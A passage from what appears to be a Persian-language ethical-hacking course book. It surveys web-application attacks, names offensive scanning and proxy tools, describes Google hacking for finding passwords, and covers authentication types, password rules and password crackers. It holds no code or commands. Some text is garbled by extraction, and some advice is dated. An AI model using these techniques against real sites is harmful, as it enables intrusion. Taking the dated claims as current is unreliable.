Directory traversal/Unicode: ﻫﻜﺮ، از ﻃﺮﻳﻖ ﻳﻚ ﻣﺮورﮔﺮ ﻳﺎ windows explorer ، ﺗﻤﺎم ﭘﻮﺷﻪ ﻫﺎي روي ﻳﻚ ﺳﻴﺴﺘﻢ را ﻣﻲ ﺑﻴﻨﺪ . ﺑﺮاي ﺟﻠﻮﮔﻴﺮي از آن، ﺑﺮاي ﭘﻮﺷﻪ ﻫﺎي ﺧﺼﻮﺻﻲ روي وب ﺳﺮور، ﺠﻣ زﻮ دﺳﺘﺮﺳﻲ ﺗﻌﺮﻳﻒ ﻛﻨﻴﺪ . ﺗﻤﺎم patch ﻫﺎ و hotfix ﻫﺎ را ﻧﺼﺐ ﻛﻨﻴﺪ.

153

Cookie poisoning and snooping: ﻛﻮﻛﻲ ﻫﺎ ﺑﺮاي ﻧﮕﻬﺪاري ا ز وﺿﻌﻴﺖ ﻧﺸﺴﺖ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮﻧﺪ . poisoning ، ﺑﻪ ﻫﻜﺮ اﺟﺎزه ﻣﻲ دﻫﺪ ﺗﺎ ﻣﺤﺘﻮاي ﻣﺨﺮب را دراو ﻛﻨﺪ و ﺑﻪ اﻃﻼﻋﺎت ﻏﻴﺮ ﻣﺠﺎز دﺳﺘﺮﺳﻲ ﭘﻴﺪا ﻛﻨﺪ . در اﻳﻦ ﺣﻤﻠﻪ، ﻫﻜﺮ، ﻛﻮﻛﻲ ﻫﺎ را ﺧﺮاب ﻣﻲ ﻛﻨﺪ ﻳﺎ ﻣﻲ دزدد . .

ﺑﺮاي ﻣﻘﺎﺑﻠﻪ ﺑﺎ آن،

• ﭘﺴﻮردﻫﺎي رﻣﺰ ﻧﺸﺪه را در ﻛﻮﻛﻲ ذﺧﻴﺮه ﻧﻜﻨﻴﺪ • ﺑﺮاي ﻛﻮﻛﻲ ﻫﺎ، ﺪﻣ ت اﻧﻘﻀﺎ ( timeout ) ﺗﻌﺮﻳﻒ ﻛﻨﻴﺪ • اﻃﻼﻋﺎت ﻫﻮﻳﺘﻲ ﻛﻮﻛﻲ ﻫﺎ ﺑﺎﻳﺪ ﺑﺎ آدرس IP ، ﻫﻤﺮاه ﺑﺎﺷﺪ • ﺑﺮاي ﺧﺮوج ، از logout اﺳﺘﻔﺎده ﻛﻨﻴﺪ

Buffer overflow: ﻣﻘﺪار زﻳﺎدي از داده ﻫﺎ از ﻃﺮﻳﻖ ﻳﻚ وب ﻓﺮم ﺑﺮاي اﺟﺮاي دﺳﺘﻮرات، ﺑﻪ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﺗﺤﺖ وب ارﺳﺎل ﻣﻲ ﺷﻮﻧﺪ . ﻣﺸﻜﻞ ﺳﺮرﻳﺰي ﺑﺎﻓﺮ در ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﺗﺤﺖ وب، اﺣﺘﻤﺎل ﻛﻤﺘﺮي ﺑﺮاي ﺷﻨﺎﺳﺎﻳﻲ دارﻧﺪ . ﺗﻘﺮﺑﻴﺎ ﺗﻤﺎم وب ﺳﺮورﻫﺎ، اﭘﻠﻴﻜﺸﻦ ﺳﺮورﻫﺎ، و ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﺗﺤﺖ وب ( ﺑﻪ ﺟﺰ Java و J2EE) ، ﻣﺴﺘﻌﺪ اﻳﻦ ﺣﻤﻠﻪ ﻫﺴﺘﻨﺪ . .

ﺑﺮاي ﻣﻘﺎﺑﻠﻪ ﺑﺎ آن، ﻃﻮل ورودي را در ﻓﺮم ﻫﺎ ﺑﺮرﺳﻲ ﻛﻨﻴﺪ، از اﺑﺰارﻫﺎي StackGuard و StackShield ( ﺑﺮاي ﻣﺤﻴ ﻂ ﻟﻴﻨﻮﻛﺲ ) ﺑﺮاي ﺟﻠﻮﮔﻴﺮي از ﺑﺮﻧﺎﻣﻪ ﻫﺎ و ﺳﻴﺴﺘﻢ ﻫﺎ در ﺑﺮاﺑﺮ ﺷﻜﺴﺘﻦ ﭘﺸﺘﻪ ﻫﺴﺘﻨﺪ . .

Authentication hijacking: ﻫﻜﺮ، ﻧﺸﺴﺘﻲ ﻛﻪ ﻛﺎرﺑﺮ اﻳﺠﺎد ﻛﺮده اﺳﺖ را ﻣﻲ دزدد . ﺑﺮاي ﺟﻠﻮﮔﻴﺮي از اﻳﻦ ﺣﻤﻠﻪ، از SSL ﺑﺮاي رﻣﺰﮔﺬاري ﺗﺮاﻓﻴﻚ، اﺳﺘﻔﺎده ﻛﻨﻴﺪ . .

ﺑﺮﺧﻲ دﻳﮕﺮ از ﺗﻬﺪﻳﺪات ﻋﺒﺎرﺗﻨﺪ از : Cookie ، Cryptographic interception ، Parameter/form tampering Platform ، Obfuscation application ، Error message interception attack ، Log tampering ، snppong Zero day ، Web services attacks ، Security management exploits ، DMZ protocol attacks ، exploits Network access attacks ، attack و TCP fragmentation . .

154

اﺑﺰارﻫﺎي ﻫﻚ Instant Source ، ﺑﻪ ﻫﻜﺮ اﺟﺎزه ﻣﻲ دﻫﺪ ﻛﺪ HTML را ﺑﺒﻴﻨﺪ و وﻳﺮاﻳﺶ ﻛﻨﺪ و ﺑﻪ ﻃﻮر ﻣﺴﺘﻘﻴﻢ از ﻃﺮﻳﻖ ﻳﻚ ﻣﺮورﮔﺮ وب ﻣﻮرد اﺳﺘﻔﺎده ﻗﺮار ﻣﻲ ﮔﻴﺮد . ﺑﺎ toolbar ﻛﻪ در IE اﺿﺎﻓﻪ ﻣﻲ ﻛﻨﺪ ﻣﻲ ﺗﻮاﻧﻴﺪ ﻛﺪ ﻣﺮﺑﻮط ﺑﻪ ﻫﺮ ﺑﺨﺶ از ﺻﻔﺤﻪ را ﺑﺒﻴﻨﻴﺪ . .

Wget ، اﺑﺰار دﺳﺘﻮري ﺑﺮاي ﻣﺤﻴﻂ ﻫﺎي وﻳﻨﺪوزي و ﻳﻮﻧﻴﻜﺴﻲ اﺳﺖ ﻛﻪ ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﺑﺮاي داﻧﻠﻮد ﺗﻤﺎم ﻳﻚ وب ﺳﺎﻳﺖ اﺳﺘﻔﺎده ﻛﻨﺪ . ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﻛﺪ را ﺑﻪ ﺻﻮرت آﻓﻼﻳﻦ ﺑﺒﻴﻨﺪ و ﻗﺒﻞ از اﻧﺠﺎم ﺣﻤﻠﻪ ﺑﻪ وب ﺳﺮور واﻗﻌﻲ، ﺣﻤﻼت ﺧﺎﺻﻲ را ﺗﺴﺖ ﻛﻨﺪ . .

WSDigger ، اﺑﺰاري راﻳﮕﺎن ﺑﺮاي ﺗﺴﺖ وب ﺳﺮوﻳﺲ اﺳﺖ ﻛﻪ ﺷﺎﻣﻞ ﺑﺮﺧﻲ از ﺣﻤﻼت ﺳﺎده ﺑﺮاي SQL injection ، cross-site scripting ، و ﺣﻤﻼت دﻳﮕﺮ وب اﺳﺖ . . dotDefender ، اﺑﺰاري ﺑﺮاي ﻣﺤﺎﻓﻈﺖ از ﺣﻤﻼت در ﺑﺮاﺑﺮ ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﺗﺤﺖ وب اﺳﺖ از ﻗﺒﻴﻞ : : Patch Traversal ، Header Tapmering ، Cross-site Scripting ، Proxy Takeover ، SQL Injection ، و . . Probes

Burp ، اﺑﺰاري ﺧﻮدﻛﺎر ﺑﺮاي ﺣﻤﻠﻪ ﺑﺮ ﺑﺮﻧﺎﻣﻪ ﻫﺎي وب اﺳﺖ ﻛﻪ ﻣﺒﺘﻨﻲ ﺑﺮ وﻳﻨﺪوز اﺳﺖ . ﻫﻤﭽﻨﻴﻦ ﻣﻲ ﺗﻮاﻧﺪ ﺑﺮاي ﺣﺪس ﭘﺴﻮرد ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﺗﺤﺖ وب و اﻧﺠﺎم ﺣﻤﻼ ت man-in-the-middle اﺳﺘﻔﺎده ﺷﻮد . .

WebSleuth ، ﺑﺮاي اﻳﻨﺪﻛﺲ ﻛﺮدن ﺗﻤﺎم ﻳﻚ وب ﺳﺎﻳﺖ، از ﺗﻜﻨﻮﻟﻮژي spidering اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . ﺑﺮاي ﻣﺜﺎل، ﻣﻲ ﺗﻮاﻧﺪ ﺗﻤﺎم آدرس ﻫﺎي اﻳﻤﻴﻞ را از ﺻﻔﺤﺎت ﻣﺨﺘﻠﻒ وب ﺳﺎﻳﺖ اﺳﺘﺨﺮاج ﻛﻨﺪ . .

155

WebWatchBot ، ﻧﺮم اﻓﺰار ﻣﺎﻧﻴﺘﻮرﻳﻨﮓ و آﻧﺎﻟﻴﺰ ﺑﺮاي وب ﺳﺎﻳﺖ ﻫﺎ و دﺳﺘﮕﺎه ﻫﺎي ﺗﺤﺖ IP اﺳﺖ ﻛﻪ ﺗﺴﺖ ﻫﺎي Ping ، Port ، FTP ، POP3 ، SMTP ، HTTPS ، HTTP و DNS اﺳﺖ . ﻫﻤﭽﻨﻴﻦ داراي ﻗﺎﺑﻠﻴﺖ ﻫﺎي اﺟﺮا ﺷﺪن ﺑﻪ ﻋﻨﻮان ﺳﺮوﻳﺲ وﻳﻨﺪوز، و ﻧﻴﺰ داراي ﮔﺮاف ﺳﻪ ﺑﻌﺪي ﺳﻔﺎرﺷﻲ ﺷﺪه اﺳﺖ . .

BlackWidow ، ﻣﻲ ﺗﻮاﻧﺪ ﺗﻤ ﺎم ﺻﻔﺤﺎت ﻳﻚ وب ﺳﺎﻳﺖ را اﺳﻜﻦ ﻛﻨﺪ و ﭘﺮوﻓﺎﻳﻠﻲ از ﺳﺎﺧﺘﺎر ﺳﺎﻳﺖ، ﻓﺎﻳﻞ ﻫﺎ، آدرس ﻫﺎي اﻳﻤﻴﻞ، ﻟﻴﻨﻚ ﻫﺎي ﺧﺎرﺟﻲ و ﺣﺘﻲ ﺧﻄﺎﻫﺎي ﻟﻴﻨﻚ اﻳﺠﺎد ﻛﻨﺪ . .

ﺑ ﺮﺧﻲ دﻳﮕﺮ از اﺑﺰارﻫﺎ ﻋﺒﺎرﺗﻨﺪ از : Parosproxy ، WebScarab ، Watchfire AppScan ، Ratproxy ، Mapper ، AppScan ، AccessDriver ، Falcove ، NetBrute ، Emsa Web Monitor ، KeepNI ، و Acunetix Web . . Scanner

Google Hacking

Google hacking ، اﺳﺘﻔﺎده از ﮔﻮﮔﻞ ﺑﺮاي ﺑﻪ دﺳﺖ آوردن اﻃﻼﻋﺎت ﺑﺎ ارزﺷﻲ ﻫﻤﭽﻮن ﭘﺴﻮردﻫﺎ ﺑﺮاي ﻫﺪف اﺳﺖ . ﺑﺴﻴﺎري از اﺑﺰارﻫﺎ ﻫﻤﭽﻮن http://johnny.ihackstuff.com و Acunetix Web Vulnerability Scanner ﺷﺎﻣﻞ ﻟﻴﺴﺘﻲ از ﻛﻠﻤﺎت google hacking اﺳﺖ ﻛﻪ ﻛﺎر ﺟﺴﺘﺠﻮ را ﺳﺎده ﺗﺮ ﻣﻲ ﻛﻨﺪ . ﺑﺮاي ﻣﺜﺎل، ﺷﻤﺎ ﻣﻲ ﺗﻮاﻧﻴﺪ ﻛﻠﻤﻪ password ﻳﺎ medical records را در ﮔﻮﮔﻞ وارد ﻛﻨﻴﺪ و ﺑﺒﻴﻨﻴﺪ ﻛﻪ ﭼﻪ اﻃﻼﻋﺎﺗﻲ ﻣﻲ ﺗﻮاﻧﻴﺪ ﺑﻪ دﺳﺖ آورﻳﺪ . اﻏﻠﺐ ﻣﻮاﻗﻊ، ﮔﻮﮔﻞ، اﻃﻼﻋﺎت را ﺑﻄﻮر ﻣﺴﺘﻘﻴﻢ از ﭘﺎﻳﮕﺎه داده ﻳﺎ ﻣﺴﺘﻨﺪات ﺧﺼﻮﺻﻲ اﺳﺘﺨﺮاج ﻣﻲ ﻛﻨﺪ . .

ﺗﻜ ﻨﻴﻚ ﻫﺎي ﺷﻜﺴﺘﻦ ﭘﺴﻮرد ﻫﺎي ﻣﺒﺘﻨﻲ ﺑﺮ وب

ﺑﻪ ﻋﻨﻮان ﻛﺎرﺷﻨﺎس اﻣﻨﻴﺘﻲ ﺷﻤﺎ ﺑﺎﻳﺪ ﺑﺎ ﺗﻜﻨﻴﻚ ﻫﺎي ﺷﻜﺴﺘﻦ ﭘﺴﻮرد ﻫﺎي ﻣﺒﺘﻨﻲ ﺑﺮ وب ، اﻧﻮاع ﻣﺨﺘﻠﻒ اﺣﺮاز ﻫﻮﻳﺖ، ﻣﻔﻬﻮم ﭘﺴﻮرد ﻛﺮﻛﺮ، ﺗﻜﻨﻴﻚ ﻫﺎي ﻣﺨﺘﻠﻒ ﺷﻜﺴﺘﻦ ﭘﺴﻮرد ، و روش ﻫﺎي ﻣﻘﺎﺑﻠﻪ ﺑﺎ آﻧﻬﺎ آﺷﻨﺎ ﺑﺎﺷﻴﺪ . .

اﺣﺮاز ﻫﻮﻳﺖ

اﺣﺮاز ﻫﻮﻳﺖ، ﻓﺮآﻳﻨﺪ ﻣﺸﺨﺺ ﻛﺮدن ﻫﻮﻳﺖ ﻛﺎرﺑﺮ اﺳﺖ . در ﺷﺒﻜﻪ ﻫﺎي ﻛﺎﻣﭙﻴﻮﺗﺮي، اﺣﺮاز ﻫﻮﻳﺖ ﻣﻌﻤﻮﻻ از ﻃﺮﻳﻖ آي دي و ﭘﺴﻮرد اﻧﺠﺎم ﻣﻲ ﺷﻮد . ﻣﻤﻜﻦ اﺳﺖ ﻛﻪ ﭘﺴﻮرد، ﮔﻢ ﺷﻮد، ﻟﻮ رود ﻳﺎ ﻓﺮاﻣﻮش ﺷﻮد . .

156

اﻧﻮاع اﺣﺮاز ﻫﻮﻳﺖ

وب ﺳﺮورﻫﺎ و ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﺗﺤﺖ وب، از اﻧﻮاع ﻣﺨﺘﻠﻒ اﺣﺮاز ﻫﻮﻳﺖ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲ ﻛﻨﻨﺪ . ﻣﻬﻢ ﺗﺮﻳﻦ آن، اﺣﺮاز ﻫﻮﻳﺖ HTTP اﺳﺖ . دو ﻧﻮع اﺣﺮاز ﻫﻮﻳﺖ HTTP وﺟﻮد دارد : basic و digest . در روش اﺣﺮاز ﻫﻮﻳﺖ basic ، ﻧﺎم ﻫﺎي ﻛﺎرﺑﺮي و ﭘﺴﻮردﻫﺎ ﺑﻪ ﺻﻮرت رﻣﺰ ﻧﺸﺪه ارﺳﺎل ﻣﻲ ﺷﻮﻧﺪ در ﺣﺎﻟﻴﻜ ﻪ در روش digest ، اﻃﻼﻋﺎت اﺣﺮاز ﻫﻮﻳﺖ ﺑﺎ اﺳﺘﻔﺎده از ﻣﺪل challenge-response ﺑﺮاي اﺣﺮاز ﻫﻮﻳﺖ، hash ﻣﻲ ﺷﻮﻧﺪ . .

ﻋﻼوه ﺑﺮ اﻳﻦ، وب ﺳﺮورﻫﺎ و ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﺗﺤﺖ وب، از اﺣﺮاز ﻫﻮﻳﺖ token-based ، certificate-based ، NTLM ، و ﺑﻴﻮﻣﺘﺮﻳﻚ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲ ﻛﻨﻨﺪ . اﺣﺮاز ﻫﻮﻳﺖ NTLM ، از Internet explorer و وب ﺳﺮورﻫﺎي IIS اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ و ﺳﺒﺐ ﻣﻲ ﺷﻮد ﻛﻪ اﺣﺮاز ﻫﻮﻳﺖ NTLM ﺑﺮاي اﺣﺮاز ﻫﻮﻳﺖ داﺧﻠﻲ روي ﻳﻚ اﻳﻨﺘﺮاﻧﺖ ﻛﻪ از ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ وﻳﻨﺪوز اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ، ﺑﺴﻴﺎر ﻣﻨﺎﺳﺐ ﺑﺎﺷﺪ . وﻳﻨﺪوز 2000 و 2003 از اﺣﺮاز ﻫﻮﻳﺖ Kerberos ﺑﺮاي اﻣﻨﻴﺖ ﺑﻴﺸﺘﺮ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . اﺣﺮاز ﻫﻮﻳﺖ ﻣﺒﺘﻨﻲ ﺑﺮ ﮔﻮاﻫﻲ ( certificate-based) ، از ﮔﻮاﻫﻲ X.509 ﺑﺮاي ﺗﻜﻨﻮﻟﻮژي ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ/ ﺧﺼﻮﺻﻲ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . ﺗﻮﻛﻦ، ﻫﻤﭽﻮن SecureID ، ﻳﻚ دﺳﺘﮕﺎه ﺳﺨﺖ اﻓﺰاري اﺳﺖ ﻛﻪ ﻛﺪ اﺣﺮاز ﻫﻮﻳﺖ را ﺑﺮاي 60 ﺛﺎﻧﻴﻪ ﻧﻤﺎﻳﺶ ﻣﻲ دﻫﺪ و ﻛﺎرﺑﺮ ﻣﻲ ﺗﻮاﻧﺪ از اﻳﻦ ﻛﺪ ﺑﺮاي ورود ﺑﻪ ﻳﻚ ﺷﺒﻜﻪ اﺳﺘﻔﺎده ﻛﻨﺪ . .

157

اﺣﺮاز ﻫﻮﻳﺖ ﺑﻴﻮﻣﺘﺮﻳﻚ، ﻳﻚ ﺳﻴﺴﺘﻢ ﺗﺸﺨﻴﺺ اﻟﮕﻮ اﺳﺖ ﻛﻪ ﺑﺎ اﺳﺘﻔﺎده از وﻳﮋﮔﻲ ﻫﺎي ﻓﻴﺰﻳﻜﻲ ﺷﺨﺺ، ا ز ﻗﺒﻴﻞ اﺛﺮ اﻧﮕﺸﺖ، ﻋﻨﺒﻴﻪ ﭼﺸﻢ، ﻳﺎ اﺛﺮ ﻛﻒ دﺳﺖ ﺑﺮاي اﺣﺮاز ﻫﻮﻳﺖ ﻛﺎرﺑﺮ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . اﻳﻦ ﻧﻮع از ﺷﻨﺎﺳﺎﻳﻲ، ﻧﺴﺒﺖ ﺑﻪ اﺳﺘﻔﺎده از روش ﻫﺎي ﺳﻨﺘﻲ اﺣﺮاز ﻫﻮﻳﺖ از ﻗﺒﻴﻞ PIN اوﻟﻮﻳﺖ دارد ﺑﺮاي اﻳﻨﻜﻪ ﺷﺨﺼﻲ ﻛﻪ ﻣﻲ ﺧﻮاﻫﺪ ﺷﻨﺎﺳﺎﻳﻲ ﺷﻮد ﺑﺎﻳ ﺪ ﺑﺼﻮرت ﻓﻴﺰﻳﻜﻲ ﺣﻀﻮر داﺷﺘﻪ ﺑﺎﺷﺪ و ﻧﻴﺰ اﺳﺘﻔﺎده از اﻳﻦ روش ﺑﻪ ﺟﺎي روش ﻫﺎي ﺳﻨﺘﻲ اﻳﻦ ﻣﺰﻳﺖ را دارد ﻛﻪ ﻧﻴﺎزي ﺑﻪ ﺑﻪ ﺧﺎﻃﺮ ﺳﭙﺮدن ﭘﺴﻮرد ﻳﺎ ﺣﻤﻞ ﺗﻮﻛﻦ ﻧﺪارد . .

158

ﺷﻨﺎﺳﺎﻳﻲ ﺑﺮ ﻣﺒﻨﺎي ﺣﺎﻟﺖ ﻫﻨﺪﺳﻲ دﺳﺖ : :

در اﻳﻦ روش از ﺷﻜﻞ ﻫﻨﺪﺳﻲ دﺳﺖ ﺑﺮاي اﺣﺮاز ﻫﻮﻳﺖ ﻛﺎرﺑﺮ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . .

اﺳﻜﻦ ﺷﺒﻜﻴﻪ ﭼﺸﻢ : :

ﺑﺎ اﺳﻜﻦ اﻟﮕﻮﻫﺎي رگ ﻫﺎي ﺧﻮﻧﻲ ﺷﺒﻜﻴﻪ و اﻟﮕﻮي رگ ﻫﺎي ﻋﻨﺒﻴﻪ، ﺷﺒﻜﻴﻪ ﭼﺸﻢ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲ ﺷﻮد . ﺟﻌﻞ اﺳﻜﻦ ﺷﺒﻜﻴﻪ ﭼﺸﻢ ﺑﺴﻴﺎر دﺷﻮار اﺳﺖ ﺑﺮاي اﻳﻨﻜﻪ ﺑﺮاي ﻛﻼﻫﺒﺮداري از ﺷﺒﻜﻴﻪ ﺷﺨﺺ، ﺗﻜﻨﻮﻟﻮژي وﺟﻮد ﻧﺪارد و ﺷﺒﻜﻴﻪ ﻳﻚ ﺷﺨﺺ ﻣﺮده ﻧﻴﺰ ﺑﻪ ﺳﺮﻋﺖ ﻣﺘﻼﺷﻲ ﻣﻲ ﺷﻮد و ﻧﻤﻲ ﺗﻮان ﺑﺮاي دور زدن اﻳﻦ اﺳﻜﻦ از آن اﺳﺘﻔﺎده ﻛﺮد . .

ﺗﺸﺨﻴﺺ ﭼﻬﺮه : :

ﻧﻮﻋﻲ از اﺣﺮاز ﻫﻮﻳﺖ اﺳﺖ ﻛﻪ ﺑﺮاي ﺷﻨﺎﺳﺎﻳﻲ ﺷﺨﺺ، از ﺗﻜﻨﻴﻚ ﺗﺸﺨﻴﺺ ﭼﻬﺮه اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . ﭘﻴﺎده ﺳﺎزي اﻳﻦ روش دﺷﻮار اﺳﺖ . .

159

ﭘﺴﻮرد

ﻧﻜﺎت زﻳﺮ را در ﻣﻮرد ﭘﺴﻮردﻫﺎ ﺑﻪ ﺧﺎﻃﺮ ﺑﺴﭙﺎرﻳﺪ : :

• ﺣﺪاﻗﻞ از 8 ﻛﺎراﻛﺘﺮ اﺳﺘﻔﺎده ﻛﻨﻴﺪ • از ﺗﺮﻛﻴﺐ ﺣﺮوف ﺑﺰرگ و ﻛﻮﭼﻚ، اﻋﺪاد و ﻋﻼﺋﻢ اﺳﺘﻔﺎده ﻛﻨﻴﺪ • از ﻛﻠﻤﻪ اي ﻛﻪ در دﻳﻜﺸﻨﺮي ﻣﻮﺟﻮد اﺳﺖ اﺳﺘﻔﺎده ﻧﻜﻨﻴﺪ • از ﻳﻚ ﭘﺴﻮرد دو ﺑﺎر اﺳﺘﻔﺎده ﻧﻜﻨﻴﺪ • ﭘﺴﻮردي را اﺳﺘﻔﺎده ﻛﻨﻴﺪ ﻛﻪ ﺑﺘﻮاﻧﻴﺪ ﺑﻪ ﺧﺎﻃﺮ ﺑﺴﭙﺎرﻳﺪ • ﭘﺴﻮردي را اﻧﺘﺨﺎب ﻛﻨﻴﺪ ﻛﻪ ﻣﻲ ﺗﻮاﻧﻴﺪ ﺳﺮﻳﻊ ﺗﺎﻳﭗ ﻛﻨﻴﺪ ﺗﺎ اﺣﺘﻤﺎل shoulder surfing را ﻛﺎﻫﺶ دﻫﻴﺪ • از ﻳﻚ ﻋﺪد ﻳﺎ ﻧﺸﺎﻧﻪ ﻗﺒﻞ و ﺑﻌﺪ از ﻛﻠﻤﻪ اﺳﺘﻔﺎده ﻧﻜﻨﻴﺪ ﻣﺜﻼ microsoft1 • ﻳﻚ ﻛﻠﻤﻪ را دو ﺑﺎر ﻧﻨﻮﻳﺴﻴﺪ ﻣﺜﻼ msoftmsoft • ﻳﻚ ﻛﻠﻤﻪ را ﺑﺼﻮرت ﺑﺮﻋﻜﺲ ﻧﻨﻮﻳﺴﻴﺪ ﻣﺜﻼ tfosorcim • از آواﻫﺎ اﺳﺘﻔﺎده ﻧﻜﻨﻴﺪ ﻣﺜﻼ io io • از ﺗﻮاﻟﻲ ﻛﻠﻴﺪﻫﺎ اﺳﺘﻔﺎده ﻧﻜﻨﻴﺪ ﻣﺜﻼ qwerty ﻳﺎ asdf • از ﺗﺤﺮﻳﻒ ﺣﺮوف اﺳﺘﻔﺎده ﻧﻜﻨﻴﺪ ﻣﺜﻼ در ﻋﺒﺎرت e ، z3ro10v3 را ﺑﺎ L ، 3 و i را ﺑﻪ 1 ، و o را ﺑﻪ 0 ﺗﺒﺪﻳﻞ ﻧﻜﻨﻴﺪ • ﺑﻄﻮر ﻣﻨﻈﻢ، ﭘﺴﻮرد ﺧﻮد را ﺗﻐﻴﻴﺮ دﻫﻴﺪ ﻣﺜﻼ ﻣﺎﻫﺎﻧﻪ • ﭘﺲ از ﺑﺎزﮔﺸﺖ از ﺳﻔﺮ، ﭘﺴﻮرد ﺧﻮد را ﺗﻐﻴﻴﺮ دﻫﻴﺪ • زﻣﺎﻧﻴﻜﻪ اﺣﺴﺎس ﻛﺮدﻳﺪ ﻛﺴﻲ ﭘﺴﻮرد ﺷﻤﺎ را ﻣﻲ داﻧﺪ ﻳﺎ ﻣﻲ ﺗﻮاﻧﺪ ﺣﺪس ﺑﺰﻧﺪ، ﭘﺴﻮرد ﺧﻮد را ﺗﻐﻴﻴﺮ دﻫﻴﺪ ﻣﺜﻼ زﻣﺎﻧﻴﻜﻪ در ﻫﻨﮕﺎم ﺗﺎ ﻳﭗ ﭘﺴﻮرد، ﻛﺴﻲ ﭘﺸﺖ ﺳﺮ ﺷﻤﺎ اﻳﺴﺘﺎده ﺑﺎﺷﺪ • ﭘﺴﻮرد ﺧﻮد را ﺑﺮ روي ﻛﺎﻣﭙﻴﻮﺗﺮﺗﺎن ذﺧﻴﺮه ﻧﻜﻨﻴﺪ ﻣﮕﺮ اﻳﻨﻜﻪ ﺑﻪ ﺻﻮرت رﻣﺰ ﺷﺪه ﺑﺎﺷﻨﺪ • ﻛﺶ ﻛﺮدن ﭘﺴﻮرد ( ﻓﺎﻳﻞ ﻫﺎي pwl. ) اﻣﻦ ﻧﻴﺴﺘﻨﺪ ﺑﻨﺎﺑﺮاﻳﻦ زﻣﺎﻧﻴﻜﻪ وﻳﻨﺪوز ﺑﻪ ﺷﻤﺎ درﺑﺎره ذﺧﻴﺮه ﭘﺴﻮرد ﭘﻴﻐﺎم ﻣﻲ دﻫﺪ، آن را ذﺧﻴﺮه ﻧﻜﻨﻴﺪ • ﭘﺴﻮرد ﺧﻮد را ﺑﻪ ﻛﺴﻲ ﻧﮕﻮﻳﻴﺪ ﺣﺘﻲ ﺑﻪ ﻣﺪﻳﺮ ﺳﻴﺴﺘﻢ ﺧﻮد • ﭘﺴﻮرد ﺧﻮد را از ﻃﺮﻳﻖ اﻳﻤﻴﻞ ﻳﺎ ﻛﺎﻧﺎل ﻫﺎي ﻧﺎ اﻣﻦ دﻳﮕﺮ ارﺳﺎل ﻧﻜﻨﻴﺪ • ﭘﺴﻮرد ﺧﻮد را ﺑﺮ روي ﺗﻜﻪ ﻛﺎﻏﺬي ﺑﻨﻮﻳﺴﻴﺪ وﻟﻲ آن را رﻫﺎ ﻧﻜﻨﻴﺪ و ﺑﻪ دور از دﺳﺘﺮﺳﻲ دﻳﮕﺮان ﻧﮕﻪ دارﻳﺪ • زﻣﺎﻧﻴﻜﻪ ﭘﺴﻮرد ﺧﻮد را وارد ﻣﻲ ﻛﻨﻴﺪ ﻣﻮاﻇﺐ اﻓﺮاد ﻧﺰدﻳﻚ ﺧﻮد ﺑﺎﺷﻴﺪ • از ﻣﻜﺎﻧﻴﺰم اﺣﺮاز ﻫﻮﻳﺘﻲ ﻗﻮي ﻫﻤﭽﻮن Kerberos ﻳﺎ ﺗﻮﻛﻦ ﺑﺮاي ارﺳﺎل ﭘﺴﻮرد اﺳﺘﻔﺎده ﻛﻨﻴﺪ

160

ﻣﺜﺎل ﻫﺎﻳﻲ از ﭘﺴﻮردﻫﺎي ﺑﺪ

• "james8" : ﻧﺎم ﻛﺎرﺑﺮي آن ﺑﺴﻴﺎر ﻛﻮﺗﺎه اﺳﺖ • "samatha" : اﺳﻢ دوﺳﺖ دﺧﺘﺮ ﻛﺎرﺑﺮ اﺳﺖ ﻛﻪ ﺣﺪس زدن آن ﺳﺎده اﺳﺖ • "superstitious" : در دﻳﻜﺸﻨﺮي ﻣﻮﺟﻮد اﺳﺖ • "sUperStiTIous" : ﺗﻨﻬﺎ ﺗﺮﻛﻴﺒﻲ از ﺣﺮوف ﺑﺰرگ اﺳﺖ ﻛﻪ آن را اﻣﻦ ﻧﻤﻲ ﻛﻨﺪ • "obiwan" : در ﻟﻴﺴﺖ ﻛﻠﻤﺎت وﺟﻮد دارد • "spicer" : در دﻳﻜﺸﻨﺮي ﺟﻐﺮاﻓﻴﺎﻳﻲ ﻣﻮﺟﻮد اﺳﺖ • "qwertyuiop" : در ﻟﻴﺴﺖ ﻛﻠﻤﻪ ﻣﻮﺟﻮد اﺳﺖ

ﭘﺴﻮرد ﻛﺮﻛﺮ ﭼﻴﺴﺖ؟

ﭘﺴﻮرد ﻛﺮﻛﺮ، ﺑﺮﻧﺎﻣﻪ اي اﺳﺖ ﻛﻪ ﺑﺮاي رﻣﺰﮔﺸﺎﻳﻲ ﭘﺴﻮرد اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . ﭘﺴﻮرد ﻛﺮﻛﺮ، از روش ﻫﺎي ﻣﺒﺘﻨﻲ ﺑﺮ ﺣﻤﻼت dictionary ﻳﺎ brute-force ﺑﺮاي ﺷﻜﺴﺘﻦ ﭘﺴﻮرد اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . ﻫﺪف ﭘﺴﻮرد ﻛﺮﻛﺮ، ﺑﻪ دﺳﺖ آوردن ﭘﺴﻮرد ﻣﺪﻳﺮ ﺳﻴﺴﺘﻢ اﺳﺖ . ﺑﺎ دﺳﺘﺮﺳﻲ ﻣﺪﻳﺮ، ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﺑﻪ ﻓﺎﻳﻞ ﻫﺎ و ﺑﺮﻧﺎﻣﻪ ﻫﺎ دﺳﺘﺮﺳﻲ 